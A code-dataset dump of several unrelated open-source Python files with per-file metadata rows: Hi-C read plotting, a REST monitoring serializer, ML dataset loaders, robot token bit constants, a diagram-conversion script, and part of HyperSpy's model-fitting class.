rejoined[mollen]=0
rejoined[mollen]+=1
line=fl.next()
except StopIteration:
pass
print " finished processing {} reads".format(nreads)
#transform to arrays
maxlen = max(max(rejoined),max(des),max(rbreaks))
ind = range(1,maxlen+1)
des = map(lambda x:des.get(x,0), ind)
rbreaks = map(lambda x:rbreaks.get(x,0), ind)
rejoined = map(lambda x:rejoined.get(x,0), ind)
#reweight corner for rejoined
rejoined = map(lambda x: x**.5 * rejoined[x-1]/x, ind)
#write to files
print "write to files"
fl=open(outprefix+'_count.dat','w')
fl.write('#dist\trbreaks\tdes\trejoined\n')
for i,j,k,l in zip(ind,rbreaks,des,rejoined):
fl.write('{}\t{}\t{}\t{}\n'.format(i, j, k, l))
#transform data a bit more
ind, des, rbreaks, rejoined = \
map(lambda x: moving_average(np.array(x), ma_window),
[ind, des, rbreaks, rejoined])
des, rbreaks, rejoined = map(lambda x:x/float(x.sum()),
[des, rbreaks, rejoined])
np.insert(ind,0,0)
np.insert(des,0,0)
np.insert(rbreaks,0,0)
np.insert(rejoined,0,0)
#write plot
pp = PdfPages(outprefix+'_plot.pdf')
rcParams.update({'font.size': 10})
pde = plt.fill_between(ind, des, 0, color='r', alpha=0.5)
prb = plt.fill_between(ind, rbreaks, 0, color='b', alpha=0.5)
prj = plt.fill_between(ind, rejoined, 0, color='y', alpha=0.5)
plt.ylabel("Normalized count")
plt.ylabel("Putative DNA molecule length")
plt.title("Histogram of counts close to the diagonal")
#plt.xticks(ind[::10], rotation="vertical")
plt.legend((prb, pde, prj), ("Random breaks", "Dangling ends",
"Rejoined"))
plt.gca().set_xlim([0,maxlen])
pp.savefig()
pp.close()
def plot_strand_bias_by_distance(fnam, nreads=1000000, valid_pairs=True,
half_step=20, half_len=2000,
full_step=500, full_len=50000, savefig=None):
"""
Classify reads into four categories depending on the strand on which each
of its end is mapped, and plots the proportion of each of these categories
in function of the genomic distance between them.
Only full mapped reads mapped on two diferent restriction fragments (still
same chromosome) are considered.
The four categories are:
- Both read-ends mapped on the same strand (forward)
- Both read-ends mapped on the same strand (reverse)
- Both read-ends mapped on the different strand (facing), like extra-dangling-ends
- Both read-ends mapped on the different strand (opposed), like extra-self-circles
:params fnam: path to tsv file with intersection of mapped ends
:params True valid_pairs: consider only read-ends mapped
on different restriction fragments. If False, considers only read-ends
mapped on the same restriction fragment.
:params 1000000 nreads: number of reads used to plot (if None, all will be used)
:params 20 half_step: binning for the first part of the plot
:params 2000 half_len: maximum distance for the first part of the plot
:params 500 full_step: binning for the second part of the plot
:params 50000 full_len: maximum distance for the second part of the plot
:params None savefig: path to save figure
"""
max_len = 100000
genome_seq = OrderedDict()
pos = 0
fhandler = open(fnam)
for line in fhandler:
if line.startswith('#'):
if line.startswith('# CRM '):
crm, clen = line[6:].split('\t')
genome_seq[crm] = int(clen)
else:
break
pos += len(line)
fhandler.seek(pos)
names = ['<== <== both reverse',
'<== ==> opposed (Extra-self-circles)',
'==> <== facing (Extra-dangling-ends)',
'==> ==> both forward']
dirs = [[0 for i in range(max_len)],
[0 for i in range(max_len)],
[0 for i in range(max_len)],
[0 for i in range(max_len)]]
iterator = (fhandler.next() for _ in xrange(nreads)) if nreads else fhandler
if valid_pairs:
comp_re = lambda x, y: x != y
else:
comp_re = lambda x, y: x == y
for line in iterator:
(crm1, pos1, dir1, len1, re1, _,
crm2, pos2, dir2, len2, re2) = line.strip().split('\t')[1:12]
pos1, pos2 = int(pos1), int(pos2)
if pos2 < pos1:
pos2, pos1 = pos1, pos2
dir2, dir1 = dir1, dir2
len2, len1 = len1, len2
dir1, dir2 = int(dir1), int(dir2)
len1, len2 = int(len1), int(len2)
if dir1 == 0:
pos1 -= len1
if dir2 == 1:
pos2 += len2
diff = pos2 - pos1
# only ligated; same chromsome; bellow max_dist; not multi-contact
if comp_re(re1, re2) and crm1 == crm2 and diff < max_len and len1 == len2:
dir1, dir2 = dir1 * 2, dir2
dirs[dir1 + dir2][diff] += 1
sum_dirs = [0 for i in range(max_len)]
for i in range(max_len):
sum_dir = float(sum(dirs[d][i] for d in range(4)))
for d in range(4):
try:
dirs[d][i] = dirs[d][i] / sum_dir
except ZeroDivisionError:
dirs[d][i] = 0.
sum_dirs[i] = sum_dir
plt.figure(figsize=(14, 9))
if full_step:
axLp = plt.subplot2grid((3, 2), (0, 0), rowspan=2)
axLb = plt.subplot2grid((3, 2), (2, 0), sharex=axLp)
axRp = plt.subplot2grid((3, 2), (0, 1), rowspan=2, sharey=axLp)
axRb = plt.subplot2grid((3, 2), (2, 1), sharex=axRp, sharey=axLb)
else:
axLp = plt.subplot2grid((3, 1), (0, 0), rowspan=2)
axLb = plt.subplot2grid((3, 1), (2, 0), sharex=axLp)
for d in range(4):
axLp.plot([sum(dirs[d][i:i + half_step]) / half_step
for i in range(0, half_len - half_step, half_step)],
alpha=0.7, label=names[d])
axLp.set_ylim(0, 1)
axLp.set_yticks([0, 0.25, 0.5, 0.75, 1])
axLp.set_xlim(0, half_len / half_step)
axLp.set_xticks(axLp.get_xticks()[:-1])
axLp.set_xticklabels([str(int(i)) for i in axLp.get_xticks() * half_step])
axLp.grid()
if full_step:
axLp.spines['right'].set_visible(False)
plt.setp(axLp.get_xticklabels(), visible=False)
axLb.spines['right'].set_visible(False)
axLp.set_ylabel('Proportion of reads in each category')
axLb.bar(range(0, half_len / half_step - 1),
[sum(sum_dirs[i:i + half_step]) / half_step
for i in range(0, half_len - half_step, half_step)],
alpha=0.5, color='k')
axLb.set_ylabel("Log number of reads\nper genomic position")
axLb.set_yscale('log')
axLb.grid()
axLb.set_xlabel('Distance between mapping position of the two ends\n'
'(averaged in windows of 20 nucleotides)')
if full_step:
for d in range(4):
axRp.plot([sum(dirs[d][i:i + full_step]) / full_step
for i in range(half_len, full_len + full_step, full_step)],
alpha=0.7, label=names[d])
axRp.spines['left'].set_visible(False)
axRp.set_xlim(0, full_len / full_step - 2000 / full_step)
axRp.set_xticks(range((10000 - half_step) / full_step, (full_len + full_step) / full_step, 20))
axRp.set_xticklabels([int(i) for i in range(10000, full_len + full_step, full_step * 20)])
plt.setp(axRp.get_xticklabels(), visible=False)
axRp.legend(title='Strand on which each read-end is mapped\n(first read-end is always smaller than second)')
axRp.yaxis.tick_right()
axRp.tick_params(labelleft=False)
axRp.tick_params(labelright=False)
axRp.grid()
axRb.bar(range(0, full_len / full_step - half_len / full_step + 1),
[sum(sum_dirs[i:i + full_step]) / full_step
for i in range(half_len, full_len + full_step, full_step)],
alpha=0.5, color='k')
axRb.set_ylim(0, max(sum_dirs) * 1.1)
axRb.spines['left'].set_visible(False)
axRb.yaxis.tick_right()
axRb.tick_params(labelleft=False)
axRb.tick_params(labelright=False)
axRb.set_xlabel('Distance between mapping position of the two ends\n'
'(averaged in windows of 500 nucleotide)')
axRb.set_yscale('log')
axRb.grid()
# decorate...
d = .015 # how big to make the diagonal lines in axes coordinates
# arguments to pass to plot, just so we don't keep repeating them
kwargs = dict(transform=axLp.transAxes, color='k', clip_on=False)
axLp.plot((1 - d, 1 + d), (1-d, 1+d), **kwargs) # top-left diagonal
axLp.plot((1 - d, 1 + d), (-d, +d), **kwargs) # top-right diagonal
kwargs.update(transform=axRp.transAxes) # switch to the bottom axes
axRp.plot((-d, +d), (1 - d, 1 + d), **kwargs) # bottom-left diagonal
axRp.plot((-d, +d), (-d, +d), **kwargs) # bottom-right diagonal
w = .015
h = .030
# arguments to pass to plot, just so we don't keep repeating them
kwargs = dict(transform=axLb.transAxes, color='k', clip_on=False)
axLb.plot((1 - w, 1 + w), (1 - h, 1 + h), **kwargs) # top-left diagonal
axLb.plot((1 - w, 1 + w), ( - h, + h), **kwargs) # top-right diagonal
kwargs.update(transform=axRb.transAxes) # switch to the bottom axes
axRb.plot((- w, + w), (1 - h, 1 + h), **kwargs) # bottom-left diagonal
axRb.plot((- w, + w), ( - h, + h), **kwargs) # bottom-right diagonal
plt.subplots_adjust(wspace=0.05)
plt.subplots_adjust(hspace=0.1)
else:
axLp.legend(title='Strand on which each read-end is mapped\n(first read-end is always smaller than second)')
if savefig:
tadbit_savefig(savefig)
else:
plt.show()
# For back compatibility
def insert_sizes(fnam, savefig=None, nreads=None, max_size=99.9, axe=None,
show=False, xlog=False, stats=('median', 'perc_max'),
too_large=10000):
"""
Deprecated function, use fragment_size
"""
warn("WARNING: function has been replaced by fragment_size", category=DeprecationWarning,)
return fragment_size(fnam, savefig=savefig, nreads=nreads, max_size=max_size, axe=axe,
show=show, xlog=xlog, stats=stats,
too_large=too_large)
| gpl-3.0 | -8,409,796,578,718,925,000 | 39.094194 | 124 | 0.531199 | false |
opennode/nodeconductor | waldur_core/monitoring/serializers.py | 1 | 1672 | from collections import defaultdict
from rest_framework import serializers
from .models import ResourceItem, ResourceSla
from .utils import get_period, to_list
class ResourceSlaStateTransitionSerializer(serializers.Serializer):
timestamp = serializers.IntegerField()
state = serializers.SerializerMethodField()
def get_state(self, obj):
return obj.state and 'U' or 'D'
class MonitoringSerializerMixin(serializers.Serializer):
sla = serializers.SerializerMethodField()
monitoring_items = serializers.SerializerMethodField()
class Meta:
fields = ('sla', 'monitoring_items')
def get_sla(self, resource):
if not hasattr(self, 'sla_map_cache'):
self.sla_map_cache = {}
request = self.context['request']
items = ResourceSla.objects.filter(scope__in=to_list(self.instance))
items = items.filter(period=get_period(request))
for item in items:
self.sla_map_cache[item.object_id] = dict(
value=item.value,
agreed_value=item.agreed_value,
period=item.period
)
return self.sla_map_cache.get(resource.id)
def get_monitoring_items(self, resource):
if not hasattr(self, 'monitoring_items_map'):
self.monitoring_items_map = {}
items = ResourceItem.objects.filter(scope__in=to_list(self.instance))
self.monitoring_items_map = defaultdict(dict)
for item in items:
self.monitoring_items_map[item.object_id][item.name] = item.value
return self.monitoring_items_map.get(resource.id)
| mit | 9,157,306,062,313,611,000 | 33.122449 | 81 | 0.641746 | false |
google/dl_bounds | dl_bounds/src/data.py | 1 | 5898 | # coding=utf-8
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dataset retrieval."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cPickle
import os
from dl_bounds.src.exp_helpers import flip_labels
from dl_bounds.src.exp_helpers import get_split
import numpy as np
from scipy.io import loadmat
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelBinarizer
from sklearn.preprocessing import StandardScaler
import tensorflow as tf
def get_mnist(data_path, val_size=10000):
ds = tf.contrib.learn.datasets.mnist.read_data_sets(
data_path, one_hot=False, validation_size=val_size, seed=1)
return (ds.train.images, ds.train.labels, ds.validation.images,
ds.validation.labels)
def get_cifar10(data_path):
"""Returns cifar10 dataset.
Args:
data_path: dataset location.
Returns:
tuple (training instances, training labels,
testing instances, testing labels)
Instances of dimension # of instances X dimension.
"""
x_train = np.zeros((50000, 3072))
y_train = np.zeros((50000,), dtype=int)
x_val = np.zeros((10000, 3072))
y_val = np.zeros((10000,), dtype=int)
cur = 0
for batch_index in range(1, 6):
with tf.gfile.Open(
os.path.join(data_path,
"cifar-10-batches-py/data_batch_%d" % batch_index),
"rb") as fo:
batch_data = cPickle.load(fo)
m = batch_data["data"].shape[0]
x_train[cur:cur + m, :] = batch_data["data"].astype(np.float32)
y_train[cur:cur + m] = np.array(batch_data["labels"])
cur += m
assert cur == 50000
with tf.gfile.Open(
os.path.join(data_path, "cifar-10-batches-py/test_batch"), "rb") as fo:
batch_data = cPickle.load(fo)
x_val = batch_data["data"].astype(np.float32)
y_val = np.array(batch_data["labels"])
x_train /= 255.0
x_val /= 255.0
return (x_train, y_train, x_val, y_val)
def get_data(dataset_name, data_path, split_i, split_n, flip_label_ratio=0):
"""Returns a dataset or a given split.
Args:
dataset_name: possible choice: cifar10, mnist, covtype.
data_path: dataset location.
split_i: split index.
split_n: number of examples per split. If -1 -- returns the whole dataset.
flip_label_ratio: randomly flips given amount of labels in the
training and testing sets.
Returns:
tuple (training instances, training labels,
testing instances, testing labels)
Instances of dimension # of instances X dimension.
"""
if dataset_name == "mnist":
(x, y, _, _) = get_mnist(data_path)
# Subsampling valdation set from the training set
# (concerned that val follows a sligtly different distribution)
x_train, x_val, y_train, y_val = train_test_split(
x, y, test_size=0.2, random_state=1)
elif dataset_name == "cifar10":
(x_train, y_train, x_val, y_val) = get_cifar10(data_path)
elif dataset_name == "covtype":
with tf.gfile.Open(os.path.join(data_path, "covtype.mat"), "r") as fh:
mat = loadmat(fh)
x, y = mat["data"].T.todense(), mat["label"].squeeze()
y -= 1
StandardScaler(copy=False, with_mean=True, with_std=True).fit_transform(x)
x_train, x_val, y_train, y_val = train_test_split(
x, y, test_size=0.33, random_state=1)
if split_n > 0: # For negative split_n, return all the data
x_train, y_train = get_split(x_train, y_train, split_i, split_n)
num_classes = len(set(y_train))
if flip_label_ratio > 0:
tf.logging.info("Flipping %f%% of labels in the training set",
flip_label_ratio * 100)
y_train = flip_labels(y_train, flip_label_ratio)
y_val = flip_labels(y_val, flip_label_ratio)
assert (y_train.min() == 0) and (y_val.min() == 0)
lb = LabelBinarizer()
y_train = lb.fit_transform(y_train)
y_val = lb.transform(y_val)
return (x_train, y_train, x_val, y_val, num_classes)
class LocalDatasetProvider(object):
"""Data provider for an in-memory dataset."""
def __init__(self, x, y, limit_size=-1, shuffle_seed=1):
self.x = x
self.y = y
self.index = None
self.rand = None
self.reset_and_reshuffle(shuffle_seed)
self.limit_size(limit_size)
def get_input_dim(self):
return self.x.shape[1]
def get_output_dim(self):
return self.y.shape[1]
def has_more(self):
return self.cur < self.size
def read_next(self, n):
if self.cur <= self.size:
n_read = min(self.size - self.cur, n)
x_mb = self.x[self.index[self.cur:self.cur + n_read], :]
y_mb = self.y[self.index[self.cur:self.cur + n_read], :]
leave_out_indices = np.where(y_mb[:, 0] == -1)[0]
if leave_out_indices:
x_mb = np.delete(x_mb, leave_out_indices, axis=0)
y_mb = np.delete(y_mb, leave_out_indices, axis=0)
n_read = x_mb.shape[0]
self.cur += n_read
return x_mb, y_mb
else:
raise Exception("End-of-dataset.")
def limit_size(self, new_size):
if new_size != -1:
self.size = new_size
else:
self.size = self.x.shape[0]
def reset(self):
self.cur = 0
def reset_and_reshuffle(self, shuffle_seed):
self.cur = 0
self.index = np.arange(self.x.shape[0])
self.rand = np.random.RandomState(shuffle_seed)
self.rand.shuffle(self.index)
| apache-2.0 | 7,444,681,494,655,159,000 | 29.879581 | 80 | 0.648694 | false |
Bdanilko/EdPy | src/lib/token_bits.py | 1 | 2356 | #!/usr/bin/env python2
# * **************************************************************** **
# File: token_bits.py
# Requires: Python 2.7+ (but not Python 3.0+)
# Note: For history, changes and dates for this file, consult git.
# Author: Brian Danilko, Likeable Software ([email protected])
# Copyright 2015-2017 Microbric Pty Ltd.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License (in the doc/licenses directory)
# for more details.
#
# * **************************************************************** */
"""Contains definitions for bits in the token modules. Typically
STATUS bits are masks, and CONTROL bits are bit numbers (to be
used with setbit)
"""
STATUS_LINE_OVER_LINE = 1
STATUS_LINE_CHANGED = 2
CONTROL_LINE_POWER = 1
CONTROL_LED_POWER = 1
STATUS_MOTOR_STRAIN = 1
STATUS_MOTOR_DISTANCE = 2
CONTROL_MOTOR_SPEED_MASK = 0x0f
CONTROL_MOTOR_REMAIN_GOING = 4
CONTROL_MOTOR_CMD_MASK = 0xe0
STATUS_IRX_BILL_RECEIVED = 0x01
STATUS_IRX_MATCHED = 0x02
STATUX_IRX_CHECK_VALID = 0x04
STATUS_IRX_OBS_RIGHT = 0x08
STATUS_IRX_OBS_CENTRE = 0x10
STATUS_IRX_OBS_LEFT = 0x20
STATUS_IRX_OBS_DETECTED = 0x40
CONTROL_IRX_DO_CHECK = 0
STATUS_BEEP_TUNE_DONE = 0x01
STATUS_BEEP_TONE_DONE = 0x02
STATUS_BEEP_CLAP_DETECTED = 0x04
STATUS_BEEP_TS_ERROR = 0x08
CONTROL_BEEP_PLAY_CODED_TUNE = 0
CONTROL_BEEP_PLAY_TONE = 1
CONTROL_BEEP_PLAY_BEEP = 2
CONTROL_BEEP_PLAY_STRING_TUNE = 3
CONTROL_ITX_TRANSMIT_CHAR = 0
CONTROL_ITX_DO_OBSTACLE_DETECT = 1
CONTROL_INDEX_WRITE_16BIT = 1
CONTROL_INDEX_READ_16BIT = 2
CONTROL_INDEX_WRITE_8BIT = 5
CONTROL_INDEX_READ_8BIT = 6
STATUS_DEVICE_BUTTON_1 = 0x08
STATUS_DEVICE_BUTTON_2 = 0x04
STATUS_DEVICE_BUTTON_3 = 0x02
STATUS_DEVICE_BUTTON_4 = 0x01
STATUS_TIMER_ONE_SHOT_EXPIRED = 0x01
STATUS_TIMER_ONE_SHOT_RUNNING = 0x02
CONTROL_TIMER_TRIGGER_ONE_SHOT = 0
CONTROL_TIMER_TRIGGER_PAUSE = 1
CONTROL_TIMER_ENABLE_SLEEP = 2
| gpl-2.0 | -8,631,692,526,637,044,000 | 30.837838 | 71 | 0.688879 | false |
andy-sweet/fcdiff | doc/drawio.py | 1 | 1945 | #!/usr/bin/python
import os
import subprocess as sp
import shutil as sh
import argparse
parser = argparse.ArgumentParser(
description = 'Copies and converts drawio XML and PDF files from Dropbox'
)
parser.add_argument('-s', '--src_dir',
help = 'The src directory containing the drawio XML and PDF files',
default = '/Users/sweet/Dropbox/Apps/drawio'
)
parser.add_argument('-v', '--verbose',
help = 'Specify this to get verbose output',
action = 'store_true',
default = False
)
args = parser.parse_args()
if not os.path.isdir(args.src_dir):
raise IOError('Source directory ' + args.src_dir + ' is not a directory')
# top level destination is the same as this file
dst_dir = os.path.dirname(os.path.realpath(__file__))
# edit these to copy/convert files
file_pre = 'fcdiff'
file_dict = {
'methods' : (
'graphical_model',
'graphical_model_rt',
'graphical_model_all',
),
}
for sub_dir, sub_files in file_dict.items():
sub_dst_dir = os.path.join(dst_dir, sub_dir)
for fs in sub_files:
src_stem = os.path.join(args.src_dir, file_pre + '-' + sub_dir + '-' + fs)
dst_stem = os.path.join(sub_dst_dir, fs)
if args.verbose:
print('Copying XMl source to destination')
xml_src = src_stem + '.xml'
xml_dst = dst_stem + '.xml'
if not os.path.isfile(xml_src):
raise IOError('Could not find drawio XML file ' + xml_src)
sh.copy2(xml_src, xml_dst)
if args.verbose:
print('Copying PDF source to destination')
pdf_src = src_stem + '.pdf'
pdf_dst = dst_stem + '.pdf'
if not os.path.isfile(pdf_src):
raise IOError('Could not find drawio PDF file ' + pdf_src)
sh.copy2(pdf_src, pdf_dst)
if args.verbose:
print('Converting PDF to SVG')
svg_dst = dst_stem + '.svg'
sp.check_call(['pdf2svg', pdf_dst, svg_dst])
| mit | -1,236,257,339,607,147,800 | 28.469697 | 82 | 0.60874 | false |
sillvan/hyperspy | hyperspy/model.py | 1 | 78500 | # -*- coding: utf-8 -*-
# Copyright 2007-2011 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
import copy
import os
import tempfile
import warnings
import numbers
import numpy as np
import scipy.odr as odr
from scipy.optimize import (leastsq,
fmin,
fmin_cg,
fmin_ncg,
fmin_bfgs,
fmin_l_bfgs_b,
fmin_tnc,
fmin_powell)
from traits.trait_errors import TraitError
from hyperspy import messages
import hyperspy.drawing.spectrum
from hyperspy.drawing.utils import on_figure_window_close
from hyperspy.misc import progressbar
from hyperspy._signals.eels import Spectrum
from hyperspy.defaults_parser import preferences
from hyperspy.axes import generate_axis
from hyperspy.exceptions import WrongObjectError
from hyperspy.decorators import interactive_range_selector
from hyperspy.misc.mpfit.mpfit import mpfit
from hyperspy.axes import AxesManager
from hyperspy.drawing.widgets import (DraggableVerticalLine,
DraggableLabel)
from hyperspy.gui.tools import ComponentFit
from hyperspy.component import Component
from hyperspy.signal import Signal
class Model(list):
"""One-dimensional model and data fitting.
A model is constructed as a linear combination of :mod:`components` that
are added to the model using :meth:`append` or :meth:`extend`. There
are many predifined components available in the in the :mod:`components`
module. If needed, new components can easyly created using the code of
existing components as a template.
Once defined, the model can be fitted to the data using :meth:`fit` or
:meth:`multifit`. Once the optimizer reaches the convergence criteria or
the maximum number of iterations the new value of the component parameters
are stored in the components.
It is possible to access the components in the model by their name or by
the index in the model. An example is given at the end of this docstring.
Attributes
----------
spectrum : Spectrum instance
It contains the data to fit.
chisq : A Signal of floats
Chi-squared of the signal (or np.nan if not yet fit)
dof : A Signal of integers
Degrees of freedom of the signal (0 if not yet fit)
red_chisq
Methods
-------
append
Append one component to the model.
extend
Append multiple components to the model.
remove
Remove component from model.
as_signal
Generate a Spectrum instance (possible multidimensional)
from the model.
store_current_values
Store the value of the parameters at the current position.
fetch_stored_values
Fetch stored values of the parameters.
update_plot
Force a plot update. (In most cases the plot should update
automatically.)
set_signal_range, remove_signal range, reset_signal_range,
add signal_range.
Customize the signal range to fit.
fit, multifit
Fit the model to the data at the current position or the
full dataset.
save_parameters2file, load_parameters_from_file
Save/load the parameter values to/from a file.
plot
Plot the model and the data.
enable_plot_components, disable_plot_components
Plot each component separately. (Use after `plot`.)
set_current_values_to
Set the current value of all the parameters of the given component as
the value for all the dataset.
export_results
Save the value of the parameters in separate files.
plot_results
Plot the value of all parameters at all positions.
print_current_values
Print the value of the parameters at the current position.
enable_adjust_position, disable_adjust_position
Enable/disable interactive adjustment of the position of the components
that have a well defined position. (Use after `plot`).
fit_component
Fit just the given component in the given signal range, that can be
set interactively.
set_parameters_not_free, set_parameters_free
Fit the `free` status of several components and parameters at once.
set_parameters_value
Set the value of a parameter in components in a model to a specified
value.
Examples
--------
In the following example we create a histogram from a normal distribution
and fit it with a gaussian component. It demonstrates how to create
a model from a :class:`~._signals.spectrum.Spectrum` instance, add
components to it, adjust the value of the parameters of the components,
fit the model to the data and access the components in the model.
>>> s = signals.Spectrum(
np.random.normal(scale=2, size=10000)).get_histogram()
>>> g = components.Gaussian()
>>> m = s.create_model()
>>> m.append(g)
>>> m.print_current_values()
Components Parameter Value
Gaussian
sigma 1.000000
A 1.000000
centre 0.000000
>>> g.centre.value = 3
>>> m.print_current_values()
Components Parameter Value
Gaussian
sigma 1.000000
A 1.000000
centre 3.000000
>>> g.sigma.value
1.0
>>> m.fit()
>>> g.sigma.value
1.9779042300856682
>>> m[0].sigma.value
1.9779042300856682
>>> m["Gaussian"].centre.value
-0.072121936813224569
"""
_firstimetouch = True
def __hash__(self):
# This is needed to simulate a hashable object so that PySide does not
# raise an exception when using windows.connect
return id(self)
def __init__(self, spectrum):
self.convolved = False
self.spectrum = spectrum
self.axes_manager = self.spectrum.axes_manager
self.axis = self.axes_manager.signal_axes[0]
self.axes_manager.connect(self.fetch_stored_values)
self.free_parameters_boundaries = None
self.channel_switches = np.array([True] * len(self.axis.axis))
self._low_loss = None
self._position_widgets = []
self._plot = None
self._model_line = None
self.chisq = spectrum._get_navigation_signal()
self.chisq.change_dtype("float")
self.chisq.data.fill(np.nan)
self.chisq.metadata.General.title = \
self.spectrum.metadata.General.title + ' chi-squared'
self.dof = self.chisq._deepcopy_with_new_data(
np.zeros_like(
self.chisq.data,
dtype='int'))
self.dof.metadata.General.title = \
self.spectrum.metadata.General.title + ' degrees of freedom'
self._suspend_update = False
self._adjust_position_all = None
self._plot_components = False
def __repr__(self):
return u"<Model %s>".encode('utf8') % super(Model, self).__repr__()
def _get_component(self, object):
if isinstance(object, int) or isinstance(object, basestring):
object = self[object]
elif not isinstance(object, Component):
raise ValueError("Not a component or component id.")
if object in self:
return object
else:
raise ValueError("The component is not in the model.")
def insert(self):
raise NotImplementedError
@property
def spectrum(self):
return self._spectrum
@spectrum.setter
def spectrum(self, value):
if isinstance(value, Spectrum):
self._spectrum = value
else:
raise WrongObjectError(str(type(value)), 'Spectrum')
@property
def low_loss(self):
return self._low_loss
@low_loss.setter
def low_loss(self, value):
if value is not None:
if (value.axes_manager.navigation_shape !=
self.spectrum.axes_manager.navigation_shape):
raise ValueError('The low-loss does not have '
'the same navigation dimension as the '
'core-loss')
self._low_loss = value
self.set_convolution_axis()
self.convolved = True
else:
self._low_loss = value
self.convolution_axis = None
self.convolved = False
# Extend the list methods to call the _touch when the model is modified
def append(self, object):
# Check if any of the other components in the model has the same name
if object in self:
raise ValueError("Component already in model")
component_name_list = []
for component in self:
component_name_list.append(component.name)
name_string = ""
if object.name:
name_string = object.name
else:
name_string = object._id_name
if name_string in component_name_list:
temp_name_string = name_string
index = 0
while temp_name_string in component_name_list:
temp_name_string = name_string + "_" + str(index)
index += 1
name_string = temp_name_string
object.name = name_string
object._axes_manager = self.axes_manager
object._create_arrays()
list.append(self, object)
object.model = self
self._touch()
if self._plot_components:
self._plot_component(object)
if self._adjust_position_all is not None:
self._make_position_adjuster(object, self._adjust_position_all[0],
self._adjust_position_all[1])
def extend(self, iterable):
for object in iterable:
self.append(object)
def __delitem__(self, object):
list.__delitem__(self, object)
object.model = None
self._touch()
def remove(self, object, touch=True):
"""Remove component from model.
Examples
--------
>>> s = signals.Spectrum(np.empty(1))
>>> m = s.create_model()
>>> g = components.Gaussian()
>>> m.append(g)
You could remove `g` like this
>>> m.remove(g)
Like this:
>>> m.remove("Gaussian")
Or like this:
>>> m.remove(0)
"""
object = self._get_component(object)
for pw in self._position_widgets:
if hasattr(pw, 'component') and pw.component is object:
pw.component._position.twin = None
del pw.component
pw.close()
del pw
if hasattr(object, '_model_plot_line'):
line = object._model_plot_line
line.close()
del line
idx = self.index(object)
self.spectrum._plot.signal_plot.ax_lines.remove(
self.spectrum._plot.signal_plot.ax_lines[2 + idx])
list.remove(self, object)
object.model = None
if touch is True:
self._touch()
if self._plot_active:
self.update_plot()
def _touch(self):
"""Run model setup tasks
This function is called everytime that we add or remove components
from the model.
"""
if self._plot_active is True:
self._connect_parameters2update_plot()
__touch = _touch
def set_convolution_axis(self):
"""
Creates an axis to use to generate the data of the model in the precise
scale to obtain the correct axis and origin after convolution with the
lowloss spectrum.
"""
ll_axis = self.low_loss.axes_manager.signal_axes[0]
dimension = self.axis.size + ll_axis.size - 1
step = self.axis.scale
knot_position = ll_axis.size - ll_axis.value2index(0) - 1
self.convolution_axis = generate_axis(self.axis.offset, step,
dimension, knot_position)
def _connect_parameters2update_plot(self):
if self._plot_active is False:
return
for i, component in enumerate(self):
component.connect(
self._model_line.update)
for parameter in component.parameters:
parameter.connect(self._model_line.update)
if self._plot_components is True:
self._connect_component_lines()
def _disconnect_parameters2update_plot(self):
if self._model_line is None:
return
for component in self:
component.disconnect(self._model_line.update)
for parameter in component.parameters:
parameter.disconnect(self._model_line.update)
if self._plot_components is True:
self._disconnect_component_lines()
def as_signal(self, component_list=None, out_of_range_to_nan=True,
show_progressbar=None):
"""Returns a recreation of the dataset using the model.
the spectral range that is not fitted is filled with nans.
Parameters
----------
component_list : list of hyperspy components, optional
If a list of components is given, only the components given in the
list is used in making the returned spectrum. The components can
be specified by name, index or themselves.
out_of_range_to_nan : bool
If True the spectral range that is not fitted is filled with nans.
show_progressbar : None or bool
If True, display a progress bar. If None the default is set in
`preferences`.
Returns
-------
spectrum : An instance of the same class as `spectrum`.
Examples
--------
>>> s = signals.Spectrum(np.random.random((10,100)))
>>> m = s.create_model()
>>> l1 = components.Lorentzian()
>>> l2 = components.Lorentzian()
>>> m.append(l1)
>>> m.append(l2)
>>> s1 = m.as_signal()
>>> s2 = m.as_signal(component_list=[l1])
"""
# change actual values to whatever except bool
_multi_on_ = '_multi_on_'
_multi_off_ = '_multi_off_'
if show_progressbar is None:
show_progressbar = preferences.General.show_progressbar
if component_list:
component_list = [self._get_component(x) for x in component_list]
active_state = []
for component_ in self:
if component_.active_is_multidimensional:
if component_ not in component_list:
active_state.append(_multi_off_)
component_._toggle_connect_active_array(False)
component_.active = False
else:
active_state.append(_multi_on_)
else:
active_state.append(component_.active)
if component_ in component_list:
component_.active = True
else:
component_.active = False
data = np.empty(self.spectrum.data.shape, dtype='float')
data.fill(np.nan)
if out_of_range_to_nan is True:
channel_switches_backup = copy.copy(self.channel_switches)
self.channel_switches[:] = True
maxval = self.axes_manager.navigation_size
pbar = progressbar.progressbar(maxval=maxval,
disabled=not show_progressbar)
i = 0
for index in self.axes_manager:
self.fetch_stored_values(only_fixed=False)
data[self.axes_manager._getitem_tuple][
self.channel_switches] = self.__call__(
non_convolved=not self.convolved, onlyactive=True)
i += 1
if maxval > 0:
pbar.update(i)
pbar.finish()
if out_of_range_to_nan is True:
self.channel_switches[:] = channel_switches_backup
spectrum = self.spectrum.__class__(
data,
axes=self.spectrum.axes_manager._get_axes_dicts())
spectrum.metadata.General.title = (
self.spectrum.metadata.General.title + " from fitted model")
spectrum.metadata.Signal.binned = self.spectrum.metadata.Signal.binned
if component_list:
for component_ in self:
active_s = active_state.pop(0)
